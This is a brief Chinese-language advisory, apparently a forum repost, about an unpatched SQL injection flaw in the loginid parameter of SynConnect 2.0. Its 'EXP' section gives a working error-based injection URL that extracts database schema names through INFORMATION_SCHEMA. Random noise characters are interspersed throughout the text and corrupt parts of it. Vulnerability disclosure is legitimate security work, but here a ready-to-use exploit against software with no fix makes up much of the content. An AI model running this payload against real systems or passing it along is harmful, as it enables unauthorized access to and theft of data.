SynConnect中的loginid参数中存在SQL注入漏洞,该漏洞源于程序使用SQL查询之前没有充分验证用户提供的输入。攻击者利用该漏洞操控应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。SynConnect 2.0版本中存在漏洞,其他版本也可能受到影响。9 w; ]' F% S4 Q% ?9 [3 u6 @/ h
7 }/ K6 }/ I: C. @5 k) `- ]3 F* Z
目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
. e% ^( `& D6 K$ |4 |http://www.synchroweb.com/prod_syn.php
( z% S% F- U$ K$ G
0 \- \. T! H& a2 bEXP:
5 l3 A: B% b4 d( W
4 A9 U4 t# Q/ z$ b P- Y! fhttp://localhost/index.php?func=logoff&loginid=1011′ AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0×20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘bhdresh’=’bhdresh& j9 ?" r# S" r5 r$ I
0 p4 e4 m& C L# ]* | |